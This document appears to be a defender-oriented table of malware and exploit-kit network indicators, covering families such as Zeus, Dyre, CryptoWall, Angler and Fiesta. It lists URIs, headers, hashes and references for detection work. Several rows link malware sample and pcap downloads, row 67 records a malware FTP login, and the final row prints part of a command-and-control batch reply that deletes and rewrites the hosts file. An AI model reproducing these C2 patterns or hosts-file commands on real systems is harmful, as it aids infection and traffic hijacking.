1 | added | type | family | method | uri | path2 | header | ua | port | notes | md5s | ref_url | dl_sample | dl_pcap | strings | analysis_date | Credit |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
2 | 2015-01-22 | CRIME | Carberb / /Glupteba | GET | <p>/get_ads.php?yy=1&aid=2&atr=exts&src=199 <p>/go/p1011105.subexts <p>/go/page/landing_page_68?nid=14&layout=qna&pid= p1011105.subexts&ip=auto&no_click=1&alpo_redirect=1 <p>/javascript/live_cd/popunder_script-1400195675.js <p>/images/ffadult/css/header.css <p>/css/live_cd/ffadult/chinese/0/global_facelift-1414007370.css | <p>/get_ads.php?yy=1&aid <p>/go/ <p>/live_cd/ <p>/ffadult/ | 80 | 85acec48c593832bdd57f90aec783a28 | http://malware-traffic-analysis.net/2014/12/25/index.html | ||||||||
3 | 2015-01-22 | CRIME | Fiesta EK | GET | <p>/?_SPMq=vahK1gfvq3&z1_Aj =fW8sL8ld&nkPgy= 81S8Y0_&0Us9=dr_fSq3Jai&w7Eaf= fu5dv5&wDK9=Ydqk1z4o6&52YRK=eHl9jdJ8j&I86 __=He0S4m9G &QPy3i=J4HP58S7h&dRPS8=7bi7Y <p>/?3W_wN=I40_W5_&eht =t8vP8M8L&2ad_uO= 33KPa&_s3oi=8P5_7&QLfo= cHai8w&ZM7P_K=bSG7TH3p&UKb38= 1s4wx2s&jSJyB=cM7c <p>/?sk9=7ufJ8Ky7H8nS34n7f1h8t887R49&eDf= 1foPbZaw1VcxcHlfJdVw83P69hP1uSdYbR <p>/?_I4XS=idKbueq4kR1q8&0TsZ= Y0Wn7Lbr6K9hch&thXvW=56WPaqG2OdJ0&Ff_lty= x21dbrs8y5 <p>/?m_FxE=eh0&MkFq=H8GeS&fz7= 1l3&d2T6r=ae&LeH_9= k0Il2W&Z7i6=3S1&7h_ =Sdlc&zmGAU=i0uf&mMwf=ehp5p& ymV7T=y7lKe&Jpk_DF=_5_2 | /? | 80 | http://malware-traffic-analysis.net/2014/12/26/index.html | |||||||||
4 | 2015-01-22 | CRIME | Fiesta EK | GET | <p>/yzzzpiehxpvij8ps46znskyaqfa5ijkduakhxwcbj9 <p>/ai_qkvu2/4a374fcc5b4966050058040c015d5253005 2030f0f5201530f54070e0507525450;118800;94 <p>/ai_qkvu2/074f70a95a1651de5952585d020b5009040 4045e0c0403090b02005f0651500e54 | /ai_qkvu2/ | 80 | http://malware-traffic-analysis.net/2014/12/17/index.html | |||||||||
5 | 2015-01-22 | CRIME | Gongdad / Gong Da compromised site redirects | GET | <p>/pg/kcp/index.html <p>/popup/index.html <p>/my/by4.html | <p> is to create a new line break in the Web version of the table - Replace with Domain/IP | http://malware-traffic-analysis.net/2014/12/13/index.html | ||||||||||
6 | 2015-01-22 | CRIME | Gongdad / Gong Da EK | GET | <p>/data/file/cr/index.html <p>/data/file/cr/swfobject.js <p>/data/file/cr/jquery-1.4.2.min.js <p>/data/file/cr/main.html <p>/data/file/cr/AyVpSf.jar <p>/data/file/cr/com.class <p>/data/file/cr/edu.class <p>/data/file/cr/net.class <p>/data/file/cr/org.class /windos.exe | /data/file/cr/ | <p> is to create a new line break in the Web version of the table - Replace with Domain/IP | http://malware-traffic-analysis.net/2014/12/13/index.html | |||||||||
7 | 2015-01-22 | CRIME | Dalexis Loader | GET | <p>/tmp/pack.tar.gz <p>/assets/pack.tar.gz <p>/piwigotest/pack.tar.gz <p>/histoiredesarts/pack.tar.gz <p>/fit/pack.tar.gz | /pack.tar.gz | 80 | http://blog.malcovery.com/blog/ctb-locker-the-newest-crypto-malware-now-via-spam | |||||||||
8 | 2015-01-22 | APT | Gholee / Rocket Kitten | GET / POST | <p>/index.php?c=Ud7atknq&r=17117d <p>/index.php?c=Ud7atknq&r=1710b2 | /index.php?c= | 80 | http://securityaffairs.co/wordpress/28170/cyber-crime/gholee-malware.html | |||||||||
9 | 2015-01-22 | CRIME | Zemot | GET | /b/shoe | /b/shoe | 80 | http://securityaffairs.co/wordpress/28170/cyber-crime/gholee-malware.html | http://bit.ly/aptsamples | ||||||||
10 | 2015-01-22 | CRIME | Zemot DL via Asprox | GET | /catalog/159 | /catalog/159 | 80 | https://www.damballa.com/wp-content/uploads/2014/11/Behind_Malware_Infection_Chain_Rerdom.pdf | http://bit.ly/crimesamples | ||||||||
11 | 2015-01-22 | CRIME | Zemot downloading Rovnix | GET | /mod_jshopping_products_gdle/mod_smartslider2/ | /mod_smartslider2/ | 80 | https://www.damballa.com/wp-content/uploads/2014/11/Behind_Malware_Infection_Chain_Rerdom.pdf | http://bit.ly/crimesamples | ||||||||
12 | 2015-01-22 | CRIME | Zemot downloading Rerdom | GET | /mod_jshoppi/soft32.dl | /soft32.dl | 80 | https://www.damballa.com/wp-content/uploads/2014/11/Behind_Malware_Infection_Chain_Rerdom.pdf | http://bit.ly/crimesamples | ||||||||
13 | 2015-01-22 | CRIME | Rerdom | GET | /b/eve/<redacted> | /b/eve/ | 8080 | https://www.damballa.com/wp-content/uploads/2014/11/Behind_Malware_Infection_Chain_Rerdom.pdf | http://bit.ly/crimesamples | ||||||||
14 | 2015-01-22 | CRIME | Clickfraud | GET | /b/req/<redacted> | /b/req/ | 80 | https://www.damballa.com/wp-content/uploads/2014/11/Behind_Malware_Infection_Chain_Rerdom.pdf | |||||||||
15 | 2015-01-22 | CRIME | Cidox / Rerdom / Clickfraud | GET | <p>/b/eve/e91425775cc5d7e657bd2cc7 <p>/b/letr/21D84379F768D95442B92BC5 <p>/b/opt/E1805AD5D79824076249D696 <p>/b/req/FDD953BA382388758DF27AE4 <p>/b/pkg/<redacted> | <p>/b/eve/ <p>/b/letr/ <p>/b/opt/ <p>/b/req/ <p>/b/pkg/ | 80 | http://www.malware-traffic-analysis.net/2014/07/21/index.html | |||||||||
16 | 2015-01-22 | CRIME | Cidox / Rerdom / Clickfraud - clickurl GET | GET | /x/48petqwk9/<redacted>/AA/0 | /x/48petqwk9/ | 80 | https://www.damballa.com/wp-content/uploads/2014/11/Behind_Malware_Infection_Chain_Rerdom.pdf | |||||||||
17 | 2015-01-22 | CRIME | Cidox / Rerdom / Clickfraud - clickurl GET | GET | /2014/06/26/new-game-tech-behind-scenes-sony -playstation with referrer http://controller-best.com | referrer http://controller-best.com | 80 | ||||||||||
18 | 2015-01-22 | APT / CRIME | Scieron / Httneilc / HTClient | packet data <p>0000 16 03 01 00 41 01 00 00 3d 03 01 54 c1 2a fa 82 <p>0010 a5 0b 00 4c 7b 26 c9 33 81 bd 63 34 08 ab b3 38 <p>0020 3a de 83 db b1 9c 95 02 3e c3 34 00 00 16 00 04 <p>0030 00 05 00 0a 00 09 00 64 00 62 00 03 00 06 00 13 <p>0040 00 12 00 63 01 00 | 8081 | <p>http://www.symantec.com/security_response/writeup.jsp?docid=2014-072320-5920-99 <p>http://www.symantec.com/connect/blogs/scarab-attackers-took-aim-select-russian-targets-2012 | http://bit.ly/aptsamples | http://bit.ly/aptpcaps | |||||||||
19 | 2015-01-22 | CRIME | Zollard RFI | POST | /cgi-bin/php? %2D%64+%...<long string removed php encoded>...%2D%6E | /cgi-bin/php? | Host: <target server> User-Agent: Mozilla/5.0 (compatible; Zollard; Linux) Content-Type: application/x-www-form-urlencoded Content-Length: 1825 Connection: close | Mozilla/5.0 (compatible; Zollard; Linux) | 80 | ||||||||
20 | 2015-01-21 | CRIME | Upatre | GET | <p>/js/jquery-1.41.15.js <p>/js/jquery-1.41.15.js?aCNDrnl3=[user-agent string]&hjmcSOLrVb5fK5a =1846&kZuJV1OyPrXdK0= 1267859342&OjyOcmABhJHuu=gDyC5hx734Wu1.js <p>/js/jquery-1.41.15.js?get_message=3290013886 | /js/jquery-1.41.15.js | 80 | <p> is to create a new line break in the Web version of the table - Replace with Domain/IP | a752bedbbf6b73e52e2d7f8f3cd6a227 <p> 2c7810794a5027ddfc0568808dea3437 | http://malware-traffic-analysis.net/2015/01/21/index.html | http://malware-traffic-analysis.net/2015/01/20/index2.html | ||||||
21 | 2015-01-21 | CRIME | Cryptowall 3.0 | POST | <p>http://proxy1-1-1.i2p/fee4roy2hih9 <p>http://payto4gtpn5czl2.torforall.com/ofs20c | i2p torforall.com/ofs20c | 80 | e67edfaa0d65e822fe41bf978ccd9c3c | https://isc.sans.edu/diary/Traffic+Patterns+For+CryptoWall+30/19203 | https://malwr.com/analysis/MDA0MjIzOGFiMzVkNGEzZjg3NzdlNDAxMDljMDQyYWQ/ | |||||||
22 | 2015-01-21 | CRIME | Andromeda | POST | /ldr.php | /ldr.php | Accept: text/html, application/xhtml+xml, */*::~~Content-Type: application/x-www-form-urlencoded::~~Accept-Language: en-US:: ~~User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko | Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko | 80 | ||||||||
23 | 2015-01-21 | CRIME | Angler EK Chain | GET | /t19jl0hvv2.php | 80 | |||||||||||
24 | 2015-01-21 | CRIME | Angler EK Chain | GET | /752s2n0ndw.php | 80 | |||||||||||
25 | 2015-01-21 | CRIME | Angler EK Chain | GET | /erL0pIvz9_wyAlk2koy7L4b2qScYutODp2Cm dYZyW hw1bW9lGM8EDW8cKKjx47cp | 80 | |||||||||||
26 | 2015-01-21 | CRIME | Angler EK Chain | GET | /P-SqI9OgILhp9clsf2ne5wgWHy4i2ew2hy 48WScNKA 9m2DKeiJNTp7gSxYSPcXsN | 80 | |||||||||||
27 | 2015-01-21 | CRIME | Angler EK Chain | GET | /models/runway/ring/header.js | 80 | |||||||||||
28 | 2015-01-21 | CRIME | Angler EK Chain | GET | /code/decrease/revenue/core.js | 80 | |||||||||||
29 | 2015-01-21 | CRIME | Asprox / Kuluoz | GET | /include.php?t=20lB5S+e4qW48vWs/RXbneRWTR9t JTB67xoumOnEvak= <p>HTTPS over port 443 as a possible connectivity check | /include.php?t= | 80 | http://malware-traffic-analysis.net/2015/01/02/index.html | |||||||||
30 | 2015-01-21 | CRIME | Asprox / Kuluoz | POST | /index.php | /index.php | 80 | http://malware-traffic-analysis.net/2015/01/02/index.html | |||||||||
31 | 2015-01-21 | CRIME | Chanitor | POST | /gate.php | /gate.php | Mozilla/5.0 (Windows NT 6.1; rv:24.0) Gecko/20100101 Firefox/24.0 | 80 | |||||||||
32 | 2015-01-21 | CRIME | Chanitor Downloads | GET | <p>/wp-includes/js/tinymce/plugins/wpfullscreen/1.php <p>/wp-includes/js/tinymce/skins/lightgray/1.php <p>/wp-content/plugins/motopress-content-editor /flexslider/fonts/1.php <p>/wp-includes/js/tinymce/plugins/wpfullscreen/1.php | /1.php | 80 | ||||||||||
33 | 2015-01-21 | CRIME | Cryptowall | POST | <p>/532boskc3i0 <p>/nvebi4m4ggdokz <p>/wbkljtzpimbryt | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30) | 80 | ||||||||||
34 | 2015-01-21 | CRIME | Cryptowall | GET | <p>/wp-content/themes/exiportal/dh5x3a1815j <p>/wp-content/themes/esther/6l7de | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30) | 80 | ||||||||||
35 | 2015-01-21 | CRIME | Dridex payload | GET | <p>/mopsi/popsi.php <p>/js/bin.exe | /popsi.php /bin.exe | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C; .NET4.0E) | 80 | |||||||||
36 | 2015-01-21 | CRIME | Fake AV post compromise | GET | /?0=13&1=1&2=15&3=i&4=7600&5=0&6=1111&7 =kyxnujmwnn | 80 | http://www.malwaresigs.com/2014/02/07/fakeav-is-still-alive/ | ||||||||||
37 | 2015-01-21 | CRIME | Fiesta EK | GET | <p>/txf9p_v8/ye1PlchZ7X9pFcl0o-y3 <p>/txf9p_v8/14dcb5b6b53272fd050d5358500e540100 0750585657520d0400060703005305 ;114402;287 <p>/txf9p_v8/4dc239e53174afbc5d010f0901025302055 75709075b550e01500156520c5406 | /txf9p_v8/ | 80 | http://malware-traffic-analysis.net/2015/01/20/index.html | |||||||||
38 | 2015-01-21 | CRIME | Flashpack EK | GET | /sv62a76d18537/index.php | /index.php | 80 | ||||||||||
39 | 2015-01-21 | CRIME | GameThief | POST | /tj.asp | /tj.asp | 80 | ||||||||||
40 | 2015-01-21 | CRIME | GameThief | GET | /count.asp?mac=8-0-27-8F-E3-EB&ComPut=Windows%20XP& iellq=IE:6.0.2900.5512&mrllq=iexplore&userid=jack | /count.asp?mac= | 80 | http://malware-traffic-analysis.net/2015/01/03/index.html | |||||||||
41 | 2015-01-21 | CRIME | Gypothy | GET | /bigbight/kinkong.txt | /kinkong.txt | ~~Accept-Language: en-US::~~Accept-Encoding: gzip, deflate::~~User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E)::~~Host: adakaobiri.com::~~Connection: Keep-Alive::~~ | Accept-Language: en-US::~~Accept-Encoding: gzip, deflate::~~User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E) | 80 | ||||||||
42 | 2015-01-21 | CRIME | H-W0rm | POST | /SpCoderHere | |pcname|hostname|username .. other pc data | 80 | ||||||||||
43 | 2015-01-21 | CRIME | KaiXin EK | GET | <p>/indexindex/ <p>/indexindex/gg.jpg <p>/indexindex/jquery-1.4.2.min.js <p>/indexindex/swfobject.js <p>/indexindex/main.html <p>/xzz1.exe <p>/indexindex/NlNwQh.jar <p>/indexindex/com.class <p>/indexindex/edu.class <p>/indexindex/net.class <p>/indexindex/org.class | /indexindex/ | 80 | http://malware-traffic-analysis.net/2015/01/03/index.html | |||||||||
44 | 2015-01-21 | CRIME | Kovter | POST | <p>/9/form.php <p>/11/form.php <p>/w1/form.php <p>/1/feed.php | /form.php | Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; MALC; rv:11.0) like Gecko Host: b7-golfix.org Content-Length: 368 Cache-Control: no-cache | Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; MALC; rv:11.0) like Gecko | 80 | ||||||||
45 | 2015-01-21 | CRIME | Nuclear EK | GET / POST | <p>/XhBWV0gBT08OVFVW.html <p>/AwoVGwxQAEcOVRleDlRTBgMFR0tUV1YOVFcAHA JDQUhXVlxUVgdOVRtA <p>/ABsJAkgKUURCGlYaShlWAAACQUJfV1RCGVYEBh 1GRlVLVEJLVgUBT0AONi0fCB0j | 80 | http://malware-traffic-analysis.net/2015/01/18/index2.html | ||||||||||
46 | 2015-01-21 | CRIME | Poweliks | GET | <p>/query?version=1.7&sid=1101&builddate=201214&q= low+testosterone+in+men&ua= Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)&lang=en-US&wt=0&lr=0&ls=2 <p>/query?version=1.7&sid=1101&builddate=201214&q= fast+weight+loss&ua= Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)&lang=en-US&wt=0&lr=0&ls=2 <p>/query?version=1.7&sid=1101&builddate=201214&q= pain+in+knee+cap&ua= Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)&lang=en-US&wt=0&lr=0&ls=2 <p>/query?version=1.7&sid=1101&builddate=201214&q= anti+aging+cream+for+men&ua= Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; I Trident/5.0)&lang=en-US&wt=0&lr=0&ls=2 | ?version=1.7&sid= ls=2 | Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) | 80 | |||||||||
47 | 2015-01-21 | CRIME | Redirect to Fiesta EK | GET | /?iVXpY9be=J8v3ax4v1&V5=1lM9es5-U2&npv_F-g= aPp8X- 02- GbU&b-nd9=-2-7nwdGa9Y&_6nQ=Y90gT9oPejrdO & m_h=bv_8fzs0m6H&Zg_-tWd=f-bj0I9sai&hfUK=b3 | 80 | http://malware-traffic-analysis.net/2015/01/20/index.html | ||||||||||
48 | 2015-01-21 | CRIME | Sweet Orange EK | GET | <p>/admin4_account/mobile/movies.php?timeline=18 <p>/bad/generic/help.php?state=39 <p>/cnet/tmp/Indy_admin/investor.php?setup=20 <p>/dbadmin/wp-admin/hex/help.php?state=33 <p>/forums/example/screens/investor.php?setup=20 <p>/gcc/tmp/bad/help.php?state=25 <p>/ip/ch/investor.php?setup=20 <p>/profiles/stat/movies.php?timeline=21 | <p>/timeline=18 <p>/state=39 <p>/setup=20 <p>/state=33 <p>/state=25 <p>/timeline=21 <p>/timeline=20 <p>/france=155 <p>/state=31 | |||||||||||
49 | 2015-01-21 | CRIME | Sweet Orange EK | GET | <p>/printer.php?cover=1388&catalogp=4&links=423&speeches=171 &about=1836&arts=205&anal=1064 <p>/printer.php?cover=1388&catalogp=4&links=423&speeches=171 &about=1836&arts=205&anal=1064&errfix=urepair <p>/printer.php?rates=1764&catalogp=4&pixel=294&speeches=171 &shows=2171&trans=867&misc=1087&urepair=errfix <p>/store.php?back=669&nav_m=75&sendmail=4&stats=1186 &logout=171&state=2215&CRIME=2249 <p>/teen.php?corp=2718&what=2210&soma=4&apps=1014 &pipermail=171&intl=783&best=535 <p>/teen.php?corp=2718&what=2210&soma=4&apps=1014 &pipermail=171&intl=783&best=535&repfix=fixutil <p>/teen.php?cpan=2441&soma=4&subs=2093&pipermail=171 &feed=2093&film=663&comp=954 <p>/serial.php?help=805&browsers=4&about=2398&icons=171 &music=247&sony=430&work=2315 | <p>/printer.php <p>/store.php <p>/teen.php <p>/serial.php <p>/fixutil=repfix <p>/repfix=fixutil | 80 | ||||||||||
50 | 2015-01-21 | CRIME | TBD | POST | /store/ | /store/ | 80 | http://malware-traffic-analysis.net/2015/01/20/index2.html | |||||||||
51 | 2015-01-21 | CRIME | TBD Post Flashpack | GET | <p>/r?q=wrestling&subid=4699&link= kkCguKA.EeSIskSKW9RPYQ <p>/search?q=wrestling&subid=4699 <p>/click?q=wrestling&subid=4699&link= kkCguKA.EeSIskSKW9RPYQ | /r?q= /search?q= /click?q= | 80 | http://malware-traffic-analysis.net/2015/01/20/index.html | |||||||||
52 | 2015-01-21 | CRIME | TBD Proxy (Htbot?) | GET | <p>/ocfg.php?command=getip <p>/ocfg.php?command=getid <p>/ocfg.php?command=ghl&id=1493496 <p>/ocfg.php?command=dl&id=1493496 <p>/ocfg.php?command=version&id=1493496 <p>/ocfg.php?command=getbackconnect <p>/pointer.php?proxy=<IP>%3A24635&secret=BER5w4evtjszw4MBRW | /ocfg.php?command= | 80 | http://malware-traffic-analysis.net/2015/01/12/index.html | |||||||||
53 | 2015-01-21 | CRIME | Upatre | GET | <p>/1501us22/<PC--NAME>/0/51-SP3/0/ <p>/1501us22/<PC--NAME>/1/0/0/ <p>/2807cw/<PC-Name>/1/0/0/ <p>/2807cw/<PC-Name>/41/5/4/ <p>/2807cw/<PC-Name>/0/51-SP2/0/ <p>/1201uk1/<PC-Nam/0/61/0/ <p>/1201uk1/<PC-Name>/0/51-SP3/0/ <p>/1201uk1/<PC-Name>/1/0/0/ <p>/1201uk1/<PC-Name>/41/7/4/ " <p>/2307stat/<PC-Name>/0/51Service%20Pack%202/0/ <p>/2307stat/<PC-Name>/1/0/0/ <p>/2307stat/<PC-Name>/41/5/4/ | <p>/1201uk1/ <p>/2307stat/ <p>/2807cw/ <p>/1501us22/ | Mozilla/5.0, Host: <IP:port>, Cache-Control: no-cache | 80 | |||||||||
54 | 2015-01-21 | CRIME | Vavtrak / Neverquest | POST | /collection/0000004E/00/9EBD6132 | /collection/ | 80 | http://malware-traffic-analysis.net/2015/01/18/index2.html | http://malware-traffic-analysis.net/2015/01/18/index2.html | ||||||||
55 | 2015-01-21 | CRIME | Zeus | GET | <p>/backup/config.bin <p>/en/images/config.bin <p>/guardnow/config.bin <p>/guardnow/config.bin | /config.bin | Accept: */*::~~User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)::~~Host: 104.192.103.10::~~Content-Length: 128::~~Connection: Keep-Alive::~~Cache-Control: no-cache::~~::~~\030\206-yV\264;\376[\270\021\244(k\353\253\001\206\311\376^\336AGZp\323\342E\324\325\323\333"\342\234\010\214\255\257\363S\343f$\274)\356= | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | 80 | ||||||||
56 | 2015-01-21 | CRIME | Zeus | POST | /choosen/helps/file.php | /helps/file.php | Accept: */*::~~User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)::~~Host: 104.192.103.10::~~Content-Length: 128::~~Connection: Keep-Alive::~~Cache-Control: no-cache::~~::~~\030\206-yV\264;\376[\270\021\244(k\353\253\001\206\311\376^\336AGZp\323\342E\324\325\323\333"\342\234\010\214\255\257\363S\343f$\274)\356= | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | 80 | ||||||||
57 | 2015-01-20 | CRIME | AdWare Kraddare.IL | GET | /bv/config.php?q=^/irW@RwOC6RKkFiJgWt_ESwGQKBP... <very long string> ..@RwNPRwNN:: | /config.php?q=^/irW@ | 80 | http://totalhash.com/analysis/4851fcb8933220d2cb1187ab769bf96e3624b2ed | |||||||||
58 | 2015-01-20 | CRIME | AdWare Kraddare.IL | POST | /bv/config.php | /config.php | 80 | http://totalhash.com/analysis/4851fcb8933220d2cb1187ab769bf96e3624b2ed | |||||||||
59 | 2015-01-20 | CRIME | Dyre | GET | /2001uk11/HOME/1/0/0/ | /HOME/1/0/0/ | User-Agent: Mozilla/5.0 Host: 202.153.35.133:33384 Cache-Control: no-cache | Mozilla/5.0 | 80 | https://malwr.com/analysis/NmNmNDYwMzEzMzcxNGViNWE3ZmZhMGQ0MDJmNDQ5NDQ/ | |||||||
60 | 2015-01-20 | CRIME | Dyre | GET | /mandoc/eula012.pdf | /eula012.pdf | Accept: text/*, application/* User-Agent: Mozilla/5.0 Host: clicherfort.com Cache-Control: no-cache | Mozilla/5.0 | 80 | https://malwr.com/analysis/NmNmNDYwMzEzMzcxNGViNWE3ZmZhMGQ0MDJmNDQ5NDQ/ | |||||||
61 | 2015-01-20 | CRIME | Dyre | GET | /mandoc/ml1from1.tar | /ml1from1.tar | User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36 Host: essextwp.org | Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36 | https://malwr.com/analysis/NmNmNDYwMzEzMzcxNGViNWE3ZmZhMGQ0MDJmNDQ5NDQ/ | ||||||||
62 | 2015-01-20 | CRIME | Dyre plugin dl | GET | /ineede900.rar | 80 | |||||||||||
63 | 2015-01-20 | CRIME | Kazy | GET | /cmd/api.php?mk=20140708041847777&action= get_availability&partoffer_id=11229&a2=FR | /api.php?mk= | 80 | https://www.virustotal.com/en/file/411e52c674faac375570a8786bf88bd849dbccc4aaa895aa59c6a3c0c568ccac/analysis/ | |||||||||
64 | 2015-01-20 | CRIME | Mudrop | GET | /gcs?alpha=YBvfs8NDNYK3vSEO+ p6fL2KZts4yS8inp2oWpqiDOinE/IJmP6Ktx9+Px+c= | /gcs?alpha= | Host: api.greenerweb.info Cache-Control: no-store,no-cache Pragma: no-cache Connection: Keep-Alive | ||||||||||
65 | 2013-11-12 | CRIME | ChePro (Brazil.banker) | GET | /ini/xvwmmwb.mod | /xvwmmwb.mod | Accept: */* Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022) Host: www.aspramece.com.br Connection: Keep-Alive | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022) | embedded in RTF | 2A5E5D3C536DA346849750A4B8C8613A (RTF dropper) 6D78F17AC2E4B95A671B079F25DD3B79 (RTF dropper) | http://www.securelist.com/en/blog/208214122/Brazilian_bankers_gone_wild_now_using_malicious_Office_files | http://bit.ly/crimesamples | http://bit.ly/crimepcaps | http://contagioexchange.blogspot.com/2013/11/brazilian-bamker-cinternetbankingcpl.html | 11/12/2013 | ||
66 | 2013-10-15 | CRIME | Cryptolocker | POST | /home/ | /home/ | Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022) Host: rwyngtbvunfpk.org Content-Length: 192 Connection: Close | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022) | crypt_1_sell23-09.exe_ | 9cbb128e8211a7cd00729c159815cb1c | http://nakedsecurity.sophos.com/2013/10/12/destructive-malware-cryptolocker-on-the-loose/ | http://bit.ly/crimesamples | http://bit.ly/crimepcaps | http://contagioexchange.blogspot.com/2013/10/cryptolocker-strings-CRIME.html | 10/14/2013 | ||
67 | 2013-09-10 | CRIME | Reedum | 220 ProFTPD 1.3.3a Server (Debian) [::ffff:109.234.159.254] | 220 ProFTPD 1.3.3a Server (Debian) [::ffff:109.234.159.254] USER user37704 331 .................. ............ ...... ........................ user37704 PASS intro22 230 ........................ user37704 .................. TYPE A 200 ...... .................... .. A PORT 10,0,2,15,4,24 500 ........................ .............. PORT LPRT 6,16,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,2,4,24 500 LPRT .... .................... | 0ca4f93a848cf01348336a8c6ff22daf | http://www.naked-security.com/malware/Infostealer.Reedum/ | http://bit.ly/crimesamples | http://bit.ly/crimepcaps | 3/1/2013 | |||||||
68 | 2013-09-09 | APT | Vidgrab | POST | (172.16.253.130)|1067|WinXP|D|L|No| 0..0....1..52..|No|V2010-v24|2184|0|3111947|0|1|. | ....3 HTTP/1.1 301 Moved Permanently Location:http://windowsupdate.microsoft.com/ Content-Type: text/html Connection: Keep-Alive <h1>Bad Request (Invalid Verb)</h1> .....HK|(172.16.253.130)|1067|WinXP|D|L|No|0..0....1..52..|No|V2010-v24|2184|0|3111947|0|1|. | 660709324acb88ef11f71782af28a1f0 | http://contagiodump.blogspot.com/2013/09/sandbox-miming-cve-2012-0158-in-mhtml.html#more | http://bit.ly/aptsamples | http://bit.ly/aptpcaps | http://contagioexchange.blogspot.com/2013/09/vidgrab-strings-apt.html | 9/8/2013 | |||||
69 | 2013-09-08 | APT | Page / stscout / Elise / lStudio / Wumins | GET | /29af9cdc/page_12082223.html | /page_ | Accept: */* Cookie: XX=0; BX=0 User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Win32) Host: gorush.dyndns-web.com Connection: Keep-Alive Cache-Control: no-cache Pragma: no-cache | Mozilla/4.0 (compatible; MSIE 8.0; Win32) | 443 | aaf73666cbd750ed22b80ed836d2b1e4 | http://www.fireeye.com/blog/technical/exploits-vulnerabilities/2012/09/analysis-of-malware-page.html#more | http://bit.ly/aptsamples | http://bit.ly/aptpcaps | http://contagioexchange.blogspot.com/2013/09/page-elise-lstudio-wumins-strings-apt.html | 9/8/2013 | ||
70 | 2013-09-08 | CRIME | Tijcont | GET | /s/blog_b2afd7fe01019tkf.htm | /blog_ | /3.txt Accept: */* Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022) Host: 110.34.198.123:888 Connection: Keep-Alive /s/blog_b2afd7fe01019tkf.html User-Agent: getURLDown Host: blog.sina.com.cn /album/w=1600;q=90/sign=862e65d610dfa9ecfd2e521152e0cc72/9358d109b3de9c82a5a5fe456d81800a18d84333.jpg User-Agent: loadMM Host: e.hiphotos.bdimg.com | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022) ** User-Agent: getURLDown ** User-Agent: loadMM | 80,6000,8888, | C2 Server reply @echo off echo. del %systemroot%\system32\drivers\etc\hosts.ics echo 67.198.255.93 